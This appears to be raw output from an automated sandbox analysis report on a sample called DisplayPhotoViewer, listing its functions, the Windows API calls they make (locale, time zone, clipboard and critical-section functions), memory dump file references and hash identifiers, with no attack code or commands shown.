                                                                                                    • Instruction Fuzzy Hash: C431B43AE016159FDB24DF24D4C079A7BA8BF44354F0580BAEC06AF246D775E844CBE0
                                                                                                    Function 1070E05D Relevance: 4.7, APIs: 3, Instructions: 207timeCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706), ref: 107079A4
                                                                                                      • Part of subcall function 10707967: EnterCriticalSection.KERNEL32(?,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706,?), ref: 107079BF
                                                                                                      • Part of subcall function 107079C8: LeaveCriticalSection.KERNEL32(?,107047BD,00000009,107047A9,00000000,?,00000000,10712290,?), ref: 107079D5
                                                                                                    • GetTimeZoneInformation.KERNEL32(0000000C,10723E48,?,74DEE860,0000000B,0000000B,?,1070E038,1070D4A6,10723E48,?,74DEE860,?,1070D14B,?,?), ref: 1070E0AB
                                                                                                    • WideCharToMultiByte.KERNEL32(00000220,10715E84,000000FF,0000003F,00000000,?,?,1070E038,1070D4A6,10723E48,?,74DEE860,?,1070D14B,?,?), ref: 1070E141
                                                                                                    • WideCharToMultiByte.KERNEL32(00000220,10715ED8,000000FF,0000003F,00000000,?,?,1070E038,1070D4A6,10723E48,?,74DEE860,?,1070D14B,?,?), ref: 1070E17A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 3442286286-0
                                                                                                    • Opcode ID: 7b5234065218c4dd29281a33798bf34cee47203c026abf4c3338e33627006583
                                                                                                    • Instruction ID: c0148b1f78154fad7415005fc398e2e7a507128feeb73278a3172e4241bfa43c
                                                                                                    • Opcode Fuzzy Hash: 7b5234065218c4dd29281a33798bf34cee47203c026abf4c3338e33627006583
                                                                                                    • Instruction Fuzzy Hash: 2A61F571904264EED7198F28DCC5B693FE9F70B350F184B2BE0849B2E8D7705982CB59
                                                                                                    Function 1070AF75 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsValidCodePage.KERNEL32(00000000,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B059
                                                                                                    • IsValidLocale.KERNEL32(00000001), ref: 1070B06F
                                                                                                      • Part of subcall function 1070B6A6: GetVersionExA.KERNEL32(?), ref: 1070B6C0
                                                                                                      • Part of subcall function 1070B4E8: EnumSystemLocalesA.KERNEL32(1070B51F,00000001,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valid$CodeEnumLocaleLocalesPageSystemVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2902790910-0
                                                                                                    • Opcode ID: c783f8a0fbb7be298f7da548e026fbabb19134860736677e35be28a5ff60a5c8
                                                                                                    • Instruction ID: 2d16540773d5e875f80d42c3a1144de8161cb96f2d24828296457a98fe05306c
                                                                                                    • Opcode Fuzzy Hash: c783f8a0fbb7be298f7da548e026fbabb19134860736677e35be28a5ff60a5c8
                                                                                                    • Instruction Fuzzy Hash: 53312872A04261EBD7645F608CC1A3B37D4DB0B780F098229F550DE1E8E7B29F88C719
                                                                                                    Function 11031440 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 11031496
                                                                                                    • SetClipboardData.USER32(00000000,00000000), ref: 110314B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$DataFormatName
                                                                                                    • String ID:
                                                                                                    • API String ID: 3172747766-0
                                                                                                    • Opcode ID: c7bf5b5d787434796ce995803704dc1451f4c3157c670a0baf3001e37c6f6af3
                                                                                                    • Instruction ID: a3c2bb49cae5d96da6982b4746d159a6771573a4c6a789ac32fb488b2cf825bf
                                                                                                    • Opcode Fuzzy Hash: c7bf5b5d787434796ce995803704dc1451f4c3157c670a0baf3001e37c6f6af3
                                                                                                    • Instruction Fuzzy Hash: 4201D470D26625AED711DF609840A7EB3F8AF8971BF01806AEC4096044EF39EA0087A2
                                                                                                    Function 1070E7C7 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 1070E7E0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 1070E806
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharInfoLocaleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1196101659-0
                                                                                                    • Opcode ID: 0622e79bc621382e04ee5d969facebd94557347d53a8588a73571d60e4c94c78
                                                                                                    • Instruction ID: d208ce273e2f815554ad0fd5cc5e384a68f5dff77026939023bcc5692784f133
                                                                                                    • Opcode Fuzzy Hash: 0622e79bc621382e04ee5d969facebd94557347d53a8588a73571d60e4c94c78
                                                                                                    • Instruction Fuzzy Hash: D0F03031905129EBCF224F41DC49A8F7F75FB4A7A0F108A15F925A21E4D7304950DAD0
                                                                                                    Function 1070E6AE Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6C7
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharInfoLocaleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1196101659-0
                                                                                                    • Opcode ID: 96780ca37108b1cb992badbe6699df8a29fa8998b8c3766268cacb95fc440e81
                                                                                                    • Instruction ID: 44255aef8a7295c0d1d196d92c7802973bc71fb88d427546a4a905f584c99037
                                                                                                    • Opcode Fuzzy Hash: 96780ca37108b1cb992badbe6699df8a29fa8998b8c3766268cacb95fc440e81
                                                                                                    • Instruction Fuzzy Hash: EEF05E32904129EBCF228F95EC05A8E7BB1FB967B1F108B25F935621E4D7724821DA94
                                                                                                    Function 1070B6DC Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 1070B71D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 603e90d914acb86c3d242c26025f8b1f79bb14fd2f7965f3d1cb6f1197a141ab
                                                                                                    • Instruction ID: 891b4867fabae4b75406de1606f1bccba7f2eb61476d953d311ebbc39e61a55b
                                                                                                    • Opcode Fuzzy Hash: 603e90d914acb86c3d242c26025f8b1f79bb14fd2f7965f3d1cb6f1197a141ab
                                                                                                    • Instruction Fuzzy Hash: 38212B33614106ABCF5C8E34ED85A7977D4EBC6241B522337E541CE2E9EA31DF408294
                                                                                                    Function 1070B14A Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumSystemLocalesA.KERNEL32(1070B1D1,00000001,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B1B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: b58e2cc3e0bdee12638f17c059a55837449964bf8aa8dc8caa19b6b66757f84d
                                                                                                    • Instruction ID: 4f8aad5dc0d49090472095e44a2879dd1d5a2a5bfdd389ff4fe599b354856bd4
                                                                                                    • Opcode Fuzzy Hash: b58e2cc3e0bdee12638f17c059a55837449964bf8aa8dc8caa19b6b66757f84d
                                                                                                    • Instruction Fuzzy Hash: D5F08C7195022ADAD7499F38CC8C7643AE1EB0FB90F488318E401DE1E8C7B94688CA08
                                                                                                    Function 1070B3D5 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumSystemLocalesA.KERNEL32(1070B42B,00000001,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B414
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: 034e3c9c44b1b213fe6df325d2b94d967620c65e6282372060365d02868db8a1
                                                                                                    • Instruction ID: 1522ecac8974a96ce0cb040e9b8d5f98c3404ae0f1a59b7f1179d17f2e711051
                                                                                                    • Opcode Fuzzy Hash: 034e3c9c44b1b213fe6df325d2b94d967620c65e6282372060365d02868db8a1
                                                                                                    • Instruction Fuzzy Hash: 01E0E571D641A6DBD7899F34EC887343AE2F70BB04F888329F800CD1E5C7B607899A08
                                                                                                    Function 1070B4E7 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumSystemLocalesA.KERNEL32(1070B51F,00000001,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: 3afa70a39ca403402ad0e03a5240f4bb3dfffd867d7e447d035812c40a3e0292
                                                                                                    • Instruction ID: fd8d6d96d92f3c4e19e1cf05d3421639372ea46b410982ab85a565a448a306f4
                                                                                                    • Opcode Fuzzy Hash: 3afa70a39ca403402ad0e03a5240f4bb3dfffd867d7e447d035812c40a3e0292
                                                                                                    • Instruction Fuzzy Hash: C6D05E70A10215DBD3055F74CC4D3683AD0F709B04F888758E941CD5D4C7B586588A08
                                                                                                    Function 1070B4E8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumSystemLocalesA.KERNEL32(1070B51F,00000001,10714970,?,107148EC,10708081,?,10715C58,?,?,?,00000000), ref: 1070B508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: cb904d8ab951b1aac1cb3040dff10214636949997c0b356a6f6896e45895d15e
                                                                                                    • Instruction ID: 912d9d15002fd7dc13820c7f194bd3e2b7795722595d0d8cea61aadd4b8455e3
                                                                                                    • Opcode Fuzzy Hash: cb904d8ab951b1aac1cb3040dff10214636949997c0b356a6f6896e45895d15e
                                                                                                    • Instruction Fuzzy Hash: 35D05E70A00225DBD3055F34CC4D7683A91F70AB04F44C758E901CD1E4C3F546288B08
                                                                                                    Function 1101B580 Relevance: .3, Instructions: 336COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9101c8981777dbf91fd094bb265ccfd78d2d18e03138f204675a9a3a2b2866e2
                                                                                                    • Instruction ID: 29231fc69e5b00f90719352c1b3e23618dc7d1b02cf746d73d11017b8e76b9d2
                                                                                                    • Opcode Fuzzy Hash: 9101c8981777dbf91fd094bb265ccfd78d2d18e03138f204675a9a3a2b2866e2
                                                                                                    • Instruction Fuzzy Hash: 75C1FB309086E55BD719CF7D88A046DFFF19E96201748C69EE4F68B682C278D614DBB0
                                                                                                    Function 1070698F Relevance: .3, Instructions: 259COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                                                    • Instruction ID: 507c7cc930cee7509980ebff967148587ada111170bda122bbf062d70a2c483b
                                                                                                    • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                                                    • Instruction Fuzzy Hash: B1B18AB5A0024ADFDB15CF04C5E0A98BBE1FF49318F25C2ADD84A5B356D731EA42CB90
                                                                                                    Function 10702130 Relevance: .1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb5bcb404e8ede94a7930c7c12b83bfa04754f4f345d78fa05569dd9f4af5a90
                                                                                                    • Instruction ID: 6f105cf0fa19fac78822ca7ce22ebb644ff9675fdd1521c3eb847e397ec40ef4
                                                                                                    • Opcode Fuzzy Hash: eb5bcb404e8ede94a7930c7c12b83bfa04754f4f345d78fa05569dd9f4af5a90
                                                                                                    • Instruction Fuzzy Hash: 51212733F5142B07EB285A5CDC112F652A3DBE4760B4F827ADE0DDBB85ED69881293C0
                                                                                                    Function 110833A0 Relevance: .1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33a02c1912df8948688b62522c706b0d56de9de267a71811c8105b2f6a36511b
                                                                                                    • Instruction ID: 11650e51ca8de2b4377eb20620f1ff75fcf1c6ea7ae71994b20349ca3e7b9d39
                                                                                                    • Opcode Fuzzy Hash: 33a02c1912df8948688b62522c706b0d56de9de267a71811c8105b2f6a36511b
                                                                                                    • Instruction Fuzzy Hash: A621AF0414E6E44DDB06833984F99A3BFD24B6B216B4FD5DAD4E80F2A7C0198149DF22
                                                                                                    Function 10703240 Relevance: .0, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
